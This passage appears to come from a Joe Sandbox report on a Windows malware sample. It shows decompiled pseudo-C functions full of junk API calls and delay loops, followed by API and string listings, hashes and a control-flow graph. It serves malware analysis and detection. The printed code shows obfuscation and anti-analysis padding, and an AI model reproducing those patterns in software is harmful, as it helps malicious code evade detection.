                            				}
                            				L9:
                            				_t170 = _a4;
                            				_t138 = __imp__GetConsoleAliasesLengthA;
                            				_t177 = 0;
                            				do {
                            					if(_t177 < 0x4d13) {
                            						GetLastError();
                            						GetCharWidthA(0, 0, 0, 0); // executed
                            					}
                            					if( *0x6328e4 == 0x6b) {
                            						 *_t138(0);
                            						_v0(0, 0, 0, 0);
                            						__imp__AlphaBlend(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, _t170);
                            					}
                            					 *0x631f70 = 0;
                            					if(_t177 > 0x26edf && _a4 != 0xdfe5c2 && _a32 != 0xdf5922 &&  *0x6328e4 == 0x28) {
                            						GetComputerNameW( &_a1084,  &_a4);
                            					}
                            					_t177 = _t177 + 1;
                            				} while (_t177 < 0x180c14c3);
                            				_t143 = 0;
                            				_a8 = 0;
                            				do {
                            					if(_t143 == 0x40d) {
                            						E00409C60(0x6328e4);
                            					}
                            					if( *0x6328e4 == 0x78) {
                            						TlsFree(0);
                            						_v0 = 0;
                            						_a2 = 0;
                            						WriteConsoleOutputCharacterA(0, "fowatigahugucuxociwoviwimojubijutuponovevayixogacapilibilewar", 0, _v0,  &_a4);
                            						LoadLibraryW(0);
                            						DeleteAtom(0);
                            						GetModuleHandleW(L"gosiwosateyecehoconorexowugufexacedawasihulinidicuduforudanituf");
                            						GetPrivateProfileStringA("Diboh yinanisowog himahasakiy", "Firekax", "Riyepulota paraxuvudacenu pufu dulanomusonidi",  &_a60, 0, "Zilayayumaxavo cigay riki nujudod");
                            						FreeEnvironmentStringsA(0);
                            						ResetWriteWatch(0, 0);
                            						MoveFileA(0, 0);
                            						__imp__GetConsoleAliasExesLengthW();
                            						EnumSystemLocalesW(0, 0);
                            						_lopen(0, 0);
                            						_lwrite(0, 0, 0);
                            						SetSystemTimeAdjustment(0, 0);
                            						DebugBreak();
                            						__imp__MoveFileWithProgressA("Noyucamirohanic", "Jesotu lohi yixikonajiz direximoyuvat", 0, 0, 0);
                            						SetCommState(0, 0);
                            						EnumDateFormatsA(0, 0, 0);
                            						CreateMailslotW(0, _v24, 0, 0);
                            						WriteConsoleInputW(0, 0, 0,  &_v16);
                            						__imp__GetConsoleAliasExesLengthA();
                            						SetComputerNameW(L"Fev getejey wuzihege");
                            						GlobalGetAtomNameA(0, 0, 0);
                            						AllocConsole();
                            						GetQueuedCompletionStatus(0, 0, 0, 0, 0);
                            						GetProfileStringW(L"yazelazelewepubizopatumofo", L"tumohozexicavuvicu", L"guwigejebapugitecu",  &_a1056, 0);
                            						__imp__GetSystemWindowsDirectoryA( &_a3104, 0);
                            						SetConsoleCP(0);
                            						__imp__VerSetConditionMask(0, 0, 0, 0);
                            						EnumDateFormatsA(0, 0, 0);
                            						_t143 = _v48;
                            					}
                            					_t143 = _t143 + 1;
                            					_a8 = _t143;
                            				} while (_t143 < 0x40bd22);
                            				E00409D30();
                            				_t179 = 0;
                            				do {
                            					if( *0x6328e4 == 0x15) {
                            						SetThreadAffinityMask(0, 0);
                            					}
                            					if(_t179 == 0x1550) {
                            						_t160 =  *0x427008; // 0x423c7a
                            						 *0x6328e8 = _t160;
                            					}
                            					_t179 = _t179 + 1;
                            				} while (_t179 < 0x56a5e3);
                            				_v0 = 0x719c87;
                            				do {
                            					if( *0x6328e4 == 0xfd) {
                            						FreeEnvironmentStringsA(0);
                            					}
                            					if( *0x6328e4 == 0x23) {
                            						EnumCalendarInfoA(0, 0, 0, 0);
                            						lstrcatA( &_a56, "Nevubos mapasis");
                            						LocalAlloc(0, 0);
                            						FormatMessageW(0, 0, 0, 0,  &_a1080, 0, 0);
                            						WriteConsoleInputW(0, 0, 0,  &_v0);
                            						GlobalWire(0);
                            						GetPrivateProfileSectionNamesA(0, 0, 0);
                            					}
                            					_t36 =  &_v0;
                            					 *_t36 = _v0 - 1;
                            				} while ( *_t36 != 0);
                            				_t181 = 0;
                            				_t216 =  *0x6328e4 - _t181; // 0x1e30c0
                            				if(_t216 > 0) {
                            					do {
                            						E00409B30(_t181);
                            						_t181 = _t181 + 1;
                            						_t217 = _t181 -  *0x6328e4; // 0x1e30c0
                            					} while (_t217 < 0);
                            				}
                            				E00409C70();
                            				E00409D50();
                            				if( *0x6328e4 == 0x1d) {
                            					WriteConsoleA(0, 0, 0,  &_a4, 0);
                            					ReadConsoleW(0,  &_a1084, 0,  &_a12, 0);
                            					DebugBreak();
                            					LoadLibraryW(L"yuvipebeyuyumudog");
                            					lstrlenA(0);
                            					EnumResourceTypesA(0, 0, 0);
                            					OutputDebugStringW(0);
                            					_lwrite(0, 0, 0);
                            					__imp__GetConsoleAliasA(0,  &_a56, 0, 0);
                            					__imp__CreateActCtxW( &_v0);
                            					GetPrivateProfileStringA(0, 0, 0, 0, 0, 0);
                            					GetACP();
                            					CopyFileA(0, 0, 0);
                            					__imp__GetSystemWindowsDirectoryA( &_a3108, 0);
                            					InterlockedExchangeAdd( &_v16, 0);
                            					ContinueDebugEvent(0, 0, 0);
                            					_v32.X = 0;
                            					_v32.Y = 0;
                            					SetConsoleCursorPosition(0, _v32);
                            					__imp__GetConsoleAliasExesLengthA();
                            				}
                            				L00409C40();
                            				return 0;
                            				L8:
                            				_t156 =  *0x427548; // 0x1df7ea
                            				 *0x6328e4 = _t156;
                            				goto L9;
                            			}























                            0x00409fd5
                            0x00409fe4
                            0x00409fe8
                            0x00409ff1
                            0x00409ff8
                            0x00409fff
                            0x0040a006
                            0x0040a00d
                            0x0040a012
                            0x0040a012
                            0x0040a02a
                            0x0040a02d
                            0x0040a033
                            0x00000000
                            0x0040a040
                            0x0040a047
                            0x0040a054
                            0x0040a060
                            0x0040a067
                            0x0040a06b
                            0x0040a07f
                            0x0040a08e
                            0x0040a093
                            0x0040a0a0
                            0x0040a0b6
                            0x0040a0c0
                            0x0040a0d2
                            0x0040a0dc
                            0x0040a0e4
                            0x0040a0ee
                            0x0040a0fd
                            0x0040a109
                            0x0040a10f
                            0x0040a117
                            0x0040a121
                            0x0040a127
                            0x0040a127
                            0x0040a130
                            0x00000000
                            0x00000000
                            0x0040a132
                            0x0040a138
                            0x0040a13c
                            0x00000000
                            0x00000000
                            0x0040a142
                            0x0040a150
                            0x0040a150
                            0x0040a154
                            0x0040a160
                            0x0040a162
                            0x0040a168
                            0x0040a16a
                            0x0040a178
                            0x0040a178
                            0x0040a185
                            0x0040a189
                            0x0040a193
                            0x0040a1aa
                            0x0040a1aa
                            0x0040a1b6
                            0x0040a1c0
                            0x0040a1ec
                            0x0040a1ec
                            0x0040a1f2
                            0x0040a1f3
                            0x0040a217
                            0x0040a219
                            0x0040a220
                            0x0040a226
                            0x0040a22d
                            0x0040a22d
                            0x0040a239
                            0x0040a241
                            0x0040a24c
                            0x0040a251
                            0x0040a262
                            0x0040a26a
                            0x0040a272
                            0x0040a279
                            0x0040a296
                            0x0040a29e
                            0x0040a2a8
                            0x0040a2b2
                            0x0040a2b8
                            0x0040a2c2
                            0x0040a2cc
                            0x0040a2d8
                            0x0040a2e2
                            0x0040a2e8
                            0x0040a2fe
                            0x0040a308
                            0x0040a314
                            0x0040a321
                            0x0040a332
                            0x0040a338
                            0x0040a343
                            0x0040a34f
                            0x0040a355
                            0x0040a365
                            0x0040a384
                            0x0040a394
                            0x0040a39c
                            0x0040a3aa
                            0x0040a3b6
                            0x0040a3b8
                            0x0040a3b8
                            0x0040a3bc
                            0x0040a3c3
                            0x0040a3c3
                            0x0040a3cd
                            0x0040a3d8
                            0x0040a3e0
                            0x0040a3e7
                            0x0040a3ed
                            0x0040a3ed
                            0x0040a3f5
                            0x0040a3f7
                            0x0040a3fd
                            0x0040a3fd
                            0x0040a403
                            0x0040a404
                            0x0040a424
                            0x0040a430
                            0x0040a43a
                            0x0040a43e
                            0x0040a43e
                            0x0040a44b
                            0x0040a455
                            0x0040a461
                            0x0040a467
                            0x0040a47d
                            0x0040a48a
                            0x0040a492
                            0x0040a49e
                            0x0040a49e
                            0x0040a4a4
                            0x0040a4a4
                            0x0040a4a4
                            0x0040a4ab
                            0x0040a4ad
                            0x0040a4b3
                            0x0040a4b5
                            0x0040a4b6
                            0x0040a4bb
                            0x0040a4bc
                            0x0040a4bc
                            0x0040a4b5
                            0x0040a4c4
                            0x0040a4c9
                            0x0040a4d9
                            0x0040a4ec
                            0x0040a505
                            0x0040a50b
                            0x0040a516
                            0x0040a51e
                            0x0040a52a
                            0x0040a532
                            0x0040a53e
                            0x0040a54f
                            0x0040a55a
                            0x0040a56c
                            0x0040a572
                            0x0040a57e
                            0x0040a58e
                            0x0040a59b
                            0x0040a5a7
                            0x0040a5b1
                            0x0040a5b5
                            0x0040a5bf
                            0x0040a5c5
                            0x0040a5c5
                            0x0040a5cb
                            0x0040a5d8
                            0x0040a144
                            0x0040a144
                            0x0040a14a
                            0x00000000

                            APIs
                            • __wremove.LIBCMTD ref: 00409FE8
                              • Part of subcall function 0040B210: DeleteFileA.KERNEL32(?,?,?,00409FED,00000000), ref: 0040B21A
                              • Part of subcall function 0040B210: GetLastError.KERNEL32(?,?,00409FED,00000000), ref: 0040B224
                              • Part of subcall function 0040B210: __dosmaperr.LIBCMTD ref: 0040B240
                            • _putc.LIBCMTD ref: 00409FF1
                              • Part of subcall function 0040AFC0: __invalid_parameter.LIBCMTD ref: 0040B04D
                            • _puts.LIBCMTD ref: 00409FF8
                              • Part of subcall function 0040ACF0: __invalid_parameter.LIBCMTD ref: 0040AD7D
                            • _atexit.LIBCMTD ref: 00409FFF
                            • _malloc.LIBCMTD ref: 0040A006
                            • _perror.LIBCMTD ref: 0040A00D
                              • Part of subcall function 0040A930: ___lock_fhandle.LIBCMTD ref: 0040A96D
                              • Part of subcall function 0040A930: _strlen.LIBCMT ref: 0040A990
                              • Part of subcall function 0040A930: __write_nolock.LIBCMTD ref: 0040A9A1
                              • Part of subcall function 0040A930: __write_nolock.LIBCMTD ref: 0040A9B4
                              • Part of subcall function 0040A930: __get_sys_err_msg.LIBCMTD ref: 0040A9C4
                              • Part of subcall function 0040A930: _strlen.LIBCMT ref: 0040A9D3
                              • Part of subcall function 0040A930: __write_nolock.LIBCMTD ref: 0040A9E4
                              • Part of subcall function 0040A930: __write_nolock.LIBCMTD ref: 0040A9F7
                            • GetBinaryTypeW.KERNEL32(00000000,?), ref: 0040A054
                            • GetConsoleAliasExesA.KERNEL32(?,00000000), ref: 0040A060
                            • InitializeCriticalSection.KERNEL32(?), ref: 0040A067
                            • EnterCriticalSection.KERNEL32(00000000), ref: 0040A06B
                            • GetNumberFormatW.KERNEL32 ref: 0040A07F
                            • WriteConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 0040A0A0
                            • ReadConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040A0B6
                            • SetThreadPriority.KERNEL32(00000000,00000000), ref: 0040A0C0
                            • FindNextVolumeMountPointW.KERNEL32 ref: 0040A0D2
                            • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 0040A0DC
                            • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 0040A0E4
                            • SetProcessAffinityMask.KERNEL32 ref: 0040A0EE
                            • OpenFileMappingW.KERNEL32(00000000,00000000,wirerulaniwojujicuwuk), ref: 0040A0FD
                            • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0040A109
                            • AreFileApisANSI.KERNEL32 ref: 0040A10F
                            • CancelDeviceWakeupRequest.KERNEL32(00000000), ref: 0040A117
                            • FindFirstVolumeA.KERNEL32(00000000,00000000), ref: 0040A121
                            • GetLastError.KERNEL32 ref: 0040A16A
                            Strings
                            • Firekax, xrefs: 0040A28C
                            • Jesotu lohi yixikonajiz direximoyuvat, xrefs: 0040A2F4
                            • fowatigahugucuxociwoviwimojubijutuponovevayixogacapilibilewar, xrefs: 0040A25C
                            • guwigejebapugitecu, xrefs: 0040A375
                            • yuvipebeyuyumudog, xrefs: 0040A511
                            • tumohozexicavuvicu, xrefs: 0040A37A
                            • Riyepulota paraxuvudacenu pufu dulanomusonidi, xrefs: 0040A287
                            • Zilayayumaxavo cigay riki nujudod, xrefs: 0040A27B
                            • Diboh yinanisowog himahasakiy, xrefs: 0040A291
                            • Noyucamirohanic, xrefs: 0040A2F9
                            • Fev getejey wuzihege, xrefs: 0040A33E
                            • Nevubos mapasis, xrefs: 0040A457
                            • wirerulaniwojujicuwuk, xrefs: 0040A0F4
                            • z<B, xrefs: 0040A3F7
                            • yazelazelewepubizopatumofo, xrefs: 0040A37F
                            • z<B, xrefs: 0040A3FD
                            • gosiwosateyecehoconorexowugufexacedawasihulinidicuduforudanituf, xrefs: 0040A274
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Console__write_nolock$File$CriticalErrorFindLastOpenProcessSectionVolume__invalid_parameter_strlen$AffinityAliasAliasesApisBinaryCancelCharacterDeleteDeviceEnterExesFirstFormatInitializeLengthMappingMaskMountNextNumberOutputParametersPointPriorityReadRequestShutdownThreadTimerTypeWaitableWakeupWrite___lock_fhandle__dosmaperr__get_sys_err_msg__wremove_atexit_malloc_perror_putc_puts
                            • String ID: Diboh yinanisowog himahasakiy$Fev getejey wuzihege$Firekax$Jesotu lohi yixikonajiz direximoyuvat$Nevubos mapasis$Noyucamirohanic$Riyepulota paraxuvudacenu pufu dulanomusonidi$Zilayayumaxavo cigay riki nujudod$fowatigahugucuxociwoviwimojubijutuponovevayixogacapilibilewar$gosiwosateyecehoconorexowugufexacedawasihulinidicuduforudanituf$guwigejebapugitecu$tumohozexicavuvicu$wirerulaniwojujicuwuk$yazelazelewepubizopatumofo$yuvipebeyuyumudog$z<B$z<B
                            • API String ID: 74949174-761215093
                            • Opcode ID: 14ad3711c9c1cf01f3966dc2ea027d873af1ef5921003b9c8107bee1c545d4ff
                            • Instruction ID: 797207cfeefdb970af6bd1ed89767520cce5f6a41b7c61177561b81138972ed0
                            • Opcode Fuzzy Hash: 14ad3711c9c1cf01f3966dc2ea027d873af1ef5921003b9c8107bee1c545d4ff
                            • Instruction Fuzzy Hash: 21F10275684300BBE354ABA0DE4AF5A77A4AB4CB02F14443AF745BE1F1CBB464448B6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 68 40a039 69 40a040-40a047 68->69 70 40a12b-40a130 69->70 71 40a04d-40a127 GetBinaryTypeW GetConsoleAliasExesA InitializeCriticalSection EnterCriticalSection GetNumberFormatW WriteConsoleOutputCharacterA ReadConsoleW SetThreadPriority FindNextVolumeMountPointW SetProcessShutdownParameters GetConsoleAliasesLengthW SetProcessAffinityMask OpenFileMappingW OpenWaitableTimerW AreFileApisANSI CancelDeviceWakeupRequest FindFirstVolumeA 69->71 72 40a132-40a13c 70->72 73 40a144-40a14a 70->73 71->70 72->69 74 40a142 72->74 75 40a150-40a160 73->75 74->75 76 40a162-40a168 75->76 77 40a16a-40a178 GetLastError GetCharWidthA 76->77 78 40a17e-40a185 76->78 77->78 79 40a1b0-40a1c0 78->79 80 40a187-40a1aa GetConsoleAliasesLengthA WinHttpConnect AlphaBlend 78->80 81 40a1f2-40a1f9 79->81 82 40a1c2-40a1ca 79->82 80->79 81->76 83 40a1ff-40a21d 81->83 82->81 84 40a1cc-40a1d4 82->84 85 40a220-40a226 83->85 84->81 86 40a1d6-40a1dd 84->86 87 40a232-40a239 85->87 88 40a228-40a22d call 409c60 85->88 86->81 89 40a1df-40a1ec GetComputerNameW 86->89 91 40a3bc-40a3c7 87->91 92 40a23f-40a3b8 TlsFree WriteConsoleOutputCharacterA LoadLibraryW DeleteAtom GetModuleHandleW GetPrivateProfileStringA FreeEnvironmentStringsA ResetWriteWatch MoveFileA GetConsoleAliasExesLengthW EnumSystemLocalesW _lopen _lwrite SetSystemTimeAdjustment DebugBreak MoveFileWithProgressA SetCommState EnumDateFormatsA CreateMailslotW WriteConsoleInputW GetConsoleAliasExesLengthA SetComputerNameW GlobalGetAtomNameA AllocConsole GetQueuedCompletionStatus GetProfileStringW GetSystemWindowsDirectoryA SetConsoleCP VerSetConditionMask EnumDateFormatsA 87->92 88->87 89->81 91->85 93 40a3cd-40a3da call 409d30 91->93 92->91 96 40a3e0-40a3e7 93->96 97 40a3e9-40a3ed SetThreadAffinityMask 96->97 98 40a3ef-40a3f5 96->98 97->98 99 40a403-40a40a 98->99 100 40a3f7-40a3fd 98->100 99->96 101 40a40c-40a42c 99->101 100->99 102 40a430-40a43a 101->102 103 40a444-40a44b 102->103 104 40a43c-40a43e FreeEnvironmentStringsA 102->104 105 40a4a4-40a4a9 103->105 106 40a44d-40a49e EnumCalendarInfoA lstrcatA LocalAlloc FormatMessageW WriteConsoleInputW GlobalWire GetPrivateProfileSectionNamesA 103->106 104->103 105->102 107 40a4ab-40a4b3 105->107 106->105 108 40a4c4 call 409c70 107->108 109 40a4b5-40a4c2 call 409b30 107->109 113 40a4c9-40a4d9 call 409d50 108->113 109->108 116 40a5cb-40a5d8 call 409c40 113->116 117 40a4df-40a5c5 WriteConsoleA ReadConsoleW DebugBreak LoadLibraryW lstrlenA EnumResourceTypesA OutputDebugStringW _lwrite GetConsoleAliasA CreateActCtxW GetPrivateProfileStringA GetACP CopyFileA GetSystemWindowsDirectoryA InterlockedExchangeAdd ContinueDebugEvent SetConsoleCursorPosition GetConsoleAliasExesLengthA 113->117 117->116
                            C-Code - Quality: 76%
                            			E0040A039(intOrPtr* __edi, long _a12, long _a16, short _a18, long _a20, intOrPtr _a24, long _a28, long _a32, intOrPtr _a48, void _a68, char _a72, char _a76, short _a1072, char _a1092, short _a1096, void _a1100, char _a3120, char _a3124, char _a3148, short _a4164) {
                            				long _v0;
                            				long _v8;
                            				struct _COORD _v16;
                            				intOrPtr _v32;
                            				long _t45;
                            				intOrPtr* _t127;
                            				intOrPtr _t131;
                            				intOrPtr _t144;
                            				intOrPtr _t148;
                            				intOrPtr* _t156;
                            				long _t157;
                            				void* _t162;
                            				void* _t164;
                            				void* _t166;
                            				void* _t198;
                            				void* _t199;
                            
                            				_t156 = __edi;
                            				L1:
                            				L1:
                            				if( *0x6328e4 == 0x47) {
                            					GetBinaryTypeW(0,  &_a32);
                            					 *_t156( &_a3148, 0);
                            					InitializeCriticalSection( &_a28);
                            					EnterCriticalSection(0);
                            					GetNumberFormatW(0, 0, 0, 0,  &_a4164, 0);
                            					_a16 = 0;
                            					_a18 = 0;
                            					WriteConsoleOutputCharacterA(0, 0, 0, _a16,  &_a20);
                            					ReadConsoleW(0,  &_a68, 0,  &_a12, 0);
                            					SetThreadPriority(0, 0);
                            					__imp__FindNextVolumeMountPointW(0,  &_a1092, 0);
                            					SetProcessShutdownParameters(0, 0);
                            					__imp__GetConsoleAliasesLengthW(0);
                            					SetProcessAffinityMask(0, 0);
                            					OpenFileMappingW(0, 0, L"wirerulaniwojujicuwuk");
                            					OpenWaitableTimerW(0, 0, 0);
                            					AreFileApisANSI();
                            					CancelDeviceWakeupRequest(0);
                            					__imp__FindFirstVolumeA(0, 0);
                            					_t45 = _v16;
                            				}
                            				if(_t45 == 0x6a1) {
                            					goto L6;
                            				}
                            				_t45 = _t45 + 1;
                            				_a16 = _t45;
                            				if(_t45 < 0x1137686) {
                            					goto L1;
                            				} else {
                            				}
                            				L7:
                            				_t157 = _a20;
                            				_t127 = __imp__GetConsoleAliasesLengthA;
                            				_t162 = 0;
                            				do {
                            					if(_t162 < 0x4d13) {
                            						GetLastError();
                            						GetCharWidthA(0, 0, 0, 0); // executed
                            					}
                            					if( *0x6328e4 == 0x6b) {
                            						 *_t127(0);
                            						_v0(0, 0, 0, 0);
                            						__imp__AlphaBlend(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, _t157);
                            					}
                            					 *0x631f70 = 0;
                            					if(_t162 > 0x26edf && _a20 != 0xdfe5c2 && _a48 != 0xdf5922 &&  *0x6328e4 == 0x28) {
                            						GetComputerNameW( &_a1100,  &_a20);
                            					}
                            					_t162 = _t162 + 1;
                            				} while (_t162 < 0x180c14c3);
                            				_t131 = 0;
                            				_a24 = 0;
                            				do {
                            					if(_t131 == 0x40d) {
                            						E00409C60(0x6328e4);
                            					}
                            					if( *0x6328e4 == 0x78) {
                            						TlsFree(0);
                            						_a16 = 0;
                            						_a18 = 0;
                            						WriteConsoleOutputCharacterA(0, "fowatigahugucuxociwoviwimojubijutuponovevayixogacapilibilewar", 0, _a16,  &_a20);
                            						LoadLibraryW(0);
                            						DeleteAtom(0);
                            						GetModuleHandleW(L"gosiwosateyecehoconorexowugufexacedawasihulinidicuduforudanituf");
                            						GetPrivateProfileStringA("Diboh yinanisowog himahasakiy", "Firekax", "Riyepulota paraxuvudacenu pufu dulanomusonidi",  &_a76, 0, "Zilayayumaxavo cigay riki nujudod");
                            						FreeEnvironmentStringsA(0);
                            						ResetWriteWatch(0, 0);
                            						MoveFileA(0, 0);
                            						__imp__GetConsoleAliasExesLengthW();
                            						EnumSystemLocalesW(0, 0);
                            						_lopen(0, 0);
                            						_lwrite(0, 0, 0);
                            						SetSystemTimeAdjustment(0, 0);
                            						DebugBreak();
                            						__imp__MoveFileWithProgressA("Noyucamirohanic", "Jesotu lohi yixikonajiz direximoyuvat", 0, 0, 0);
                            						SetCommState(0, 0);
                            						EnumDateFormatsA(0, 0, 0);
                            						CreateMailslotW(0, _v8, 0, 0);
                            						WriteConsoleInputW(0, 0, 0,  &_v0);
                            						__imp__GetConsoleAliasExesLengthA();
                            						SetComputerNameW(L"Fev getejey wuzihege");
                            						GlobalGetAtomNameA(0, 0, 0);
                            						AllocConsole();
                            						GetQueuedCompletionStatus(0, 0, 0, 0, 0);
                            						GetProfileStringW(L"yazelazelewepubizopatumofo", L"tumohozexicavuvicu", L"guwigejebapugitecu",  &_a1072, 0);
                            						__imp__GetSystemWindowsDirectoryA( &_a3120, 0);
                            						SetConsoleCP(0);
                            						__imp__VerSetConditionMask(0, 0, 0, 0);
                            						EnumDateFormatsA(0, 0, 0);
                            						_t131 = _v32;
                            					}
                            					_t131 = _t131 + 1;
                            					_a24 = _t131;
                            				} while (_t131 < 0x40bd22);
                            				E00409D30();
                            				_t164 = 0;
                            				do {
                            					if( *0x6328e4 == 0x15) {
                            						SetThreadAffinityMask(0, 0);
                            					}
                            					if(_t164 == 0x1550) {
                            						_t148 =  *0x427008; // 0x423c7a
                            						 *0x6328e8 = _t148;
                            					}
                            					_t164 = _t164 + 1;
                            				} while (_t164 < 0x56a5e3);
                            				_a16 = 0x719c87;
                            				do {
                            					if( *0x6328e4 == 0xfd) {
                            						FreeEnvironmentStringsA(0);
                            					}
                            					if( *0x6328e4 == 0x23) {
                            						EnumCalendarInfoA(0, 0, 0, 0);
                            						lstrcatA( &_a72, "Nevubos mapasis");
                            						LocalAlloc(0, 0);
                            						FormatMessageW(0, 0, 0, 0,  &_a1096, 0, 0);
                            						WriteConsoleInputW(0, 0, 0,  &_a16);
                            						GlobalWire(0);
                            						GetPrivateProfileSectionNamesA(0, 0, 0);
                            					}
                            					_t35 =  &_a16;
                            					 *_t35 = _a16 - 1;
                            				} while ( *_t35 != 0);
                            				_t166 = 0;
                            				_t198 =  *0x6328e4 - _t166; // 0x1e30c0
                            				if(_t198 > 0) {
                            					do {
                            						E00409B30(_t166);
                            						_t166 = _t166 + 1;
                            						_t199 = _t166 -  *0x6328e4; // 0x1e30c0
                            					} while (_t199 < 0);
                            				}
                            				E00409C70();
                            				E00409D50();
                            				if( *0x6328e4 == 0x1d) {
                            					WriteConsoleA(0, 0, 0,  &_a20, 0);
                            					ReadConsoleW(0,  &_a1100, 0,  &_a28, 0);
                            					DebugBreak();
                            					LoadLibraryW(L"yuvipebeyuyumudog");
                            					lstrlenA(0);
                            					EnumResourceTypesA(0, 0, 0);
                            					OutputDebugStringW(0);
                            					_lwrite(0, 0, 0);
                            					__imp__GetConsoleAliasA(0,  &_a72, 0, 0);
                            					__imp__CreateActCtxW( &_a16);
                            					GetPrivateProfileStringA(0, 0, 0, 0, 0, 0);
                            					GetACP();
                            					CopyFileA(0, 0, 0);
                            					__imp__GetSystemWindowsDirectoryA( &_a3124, 0);
                            					InterlockedExchangeAdd( &_v0, 0);
                            					ContinueDebugEvent(0, 0, 0);
                            					_v16.X = 0;
                            					_v16.Y = 0;
                            					SetConsoleCursorPosition(0, _v16);
                            					__imp__GetConsoleAliasExesLengthA();
                            				}
                            				L00409C40();
                            				return 0;
                            				L6:
                            				_t144 =  *0x427548; // 0x1df7ea
                            				 *0x6328e4 = _t144;
                            				goto L7;
                            			}



















                            0x0040a039
                            0x00000000
                            0x0040a040
                            0x0040a047
                            0x0040a054
                            0x0040a060
                            0x0040a067
                            0x0040a06b
                            0x0040a07f
                            0x0040a08e
                            0x0040a093
                            0x0040a0a0
                            0x0040a0b6
                            0x0040a0c0
                            0x0040a0d2
                            0x0040a0dc
                            0x0040a0e4
                            0x0040a0ee
                            0x0040a0fd
                            0x0040a109
                            0x0040a10f
                            0x0040a117
                            0x0040a121
                            0x0040a127
                            0x0040a127
                            0x0040a130
                            0x00000000
                            0x00000000
                            0x0040a132
                            0x0040a138
                            0x0040a13c
                            0x00000000
                            0x00000000
                            0x0040a142
                            0x0040a150
                            0x0040a150
                            0x0040a154
                            0x0040a160
                            0x0040a162
                            0x0040a168
                            0x0040a16a
                            0x0040a178
                            0x0040a178
                            0x0040a185
                            0x0040a189
                            0x0040a193
                            0x0040a1aa
                            0x0040a1aa
                            0x0040a1b6
                            0x0040a1c0
                            0x0040a1ec
                            0x0040a1ec
                            0x0040a1f2
                            0x0040a1f3
                            0x0040a217
                            0x0040a219
                            0x0040a220
                            0x0040a226
                            0x0040a22d
                            0x0040a22d
                            0x0040a239
                            0x0040a241
                            0x0040a24c
                            0x0040a251
                            0x0040a262
                            0x0040a26a
                            0x0040a272
                            0x0040a279
                            0x0040a296
                            0x0040a29e
                            0x0040a2a8
                            0x0040a2b2
                            0x0040a2b8
                            0x0040a2c2
                            0x0040a2cc
                            0x0040a2d8
                            0x0040a2e2
                            0x0040a2e8
                            0x0040a2fe
                            0x0040a308
                            0x0040a314
                            0x0040a321
                            0x0040a332
                            0x0040a338
                            0x0040a343
                            0x0040a34f
                            0x0040a355
                            0x0040a365
                            0x0040a384
                            0x0040a394
                            0x0040a39c
                            0x0040a3aa
                            0x0040a3b6
                            0x0040a3b8
                            0x0040a3b8
                            0x0040a3bc
                            0x0040a3c3
                            0x0040a3c3
                            0x0040a3cd
                            0x0040a3d8
                            0x0040a3e0
                            0x0040a3e7
                            0x0040a3ed
                            0x0040a3ed
                            0x0040a3f5
                            0x0040a3f7
                            0x0040a3fd
                            0x0040a3fd
                            0x0040a403
                            0x0040a404
                            0x0040a424
                            0x0040a430
                            0x0040a43a
                            0x0040a43e
                            0x0040a43e
                            0x0040a44b
                            0x0040a455
                            0x0040a461
                            0x0040a467
                            0x0040a47d
                            0x0040a48a
                            0x0040a492
                            0x0040a49e
                            0x0040a49e
                            0x0040a4a4
                            0x0040a4a4
                            0x0040a4a4
                            0x0040a4ab
                            0x0040a4ad
                            0x0040a4b3
                            0x0040a4b5
                            0x0040a4b6
                            0x0040a4bb
                            0x0040a4bc
                            0x0040a4bc
                            0x0040a4b5
                            0x0040a4c4
                            0x0040a4c9
                            0x0040a4d9
                            0x0040a4ec
                            0x0040a505
                            0x0040a50b
                            0x0040a516
                            0x0040a51e
                            0x0040a52a
                            0x0040a532
                            0x0040a53e
                            0x0040a54f
                            0x0040a55a
                            0x0040a56c
                            0x0040a572
                            0x0040a57e
                            0x0040a58e
                            0x0040a59b
                            0x0040a5a7
                            0x0040a5b1
                            0x0040a5b5
                            0x0040a5bf
                            0x0040a5c5
                            0x0040a5c5
                            0x0040a5cb
                            0x0040a5d8
                            0x0040a144
                            0x0040a144
                            0x0040a14a
                            0x00000000

                            APIs
                            • GetBinaryTypeW.KERNEL32(00000000,?), ref: 0040A054
                            • GetConsoleAliasExesA.KERNEL32(?,00000000), ref: 0040A060
                            • InitializeCriticalSection.KERNEL32(?), ref: 0040A067
                            • EnterCriticalSection.KERNEL32(00000000), ref: 0040A06B
                            • GetNumberFormatW.KERNEL32 ref: 0040A07F
                            • WriteConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 0040A0A0
                            • ReadConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040A0B6
                            • SetThreadPriority.KERNEL32(00000000,00000000), ref: 0040A0C0
                            • FindNextVolumeMountPointW.KERNEL32 ref: 0040A0D2
                            • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 0040A0DC
                            • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 0040A0E4
                            • SetProcessAffinityMask.KERNEL32 ref: 0040A0EE
                            • OpenFileMappingW.KERNEL32(00000000,00000000,wirerulaniwojujicuwuk), ref: 0040A0FD
                            • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0040A109
                            • AreFileApisANSI.KERNEL32 ref: 0040A10F
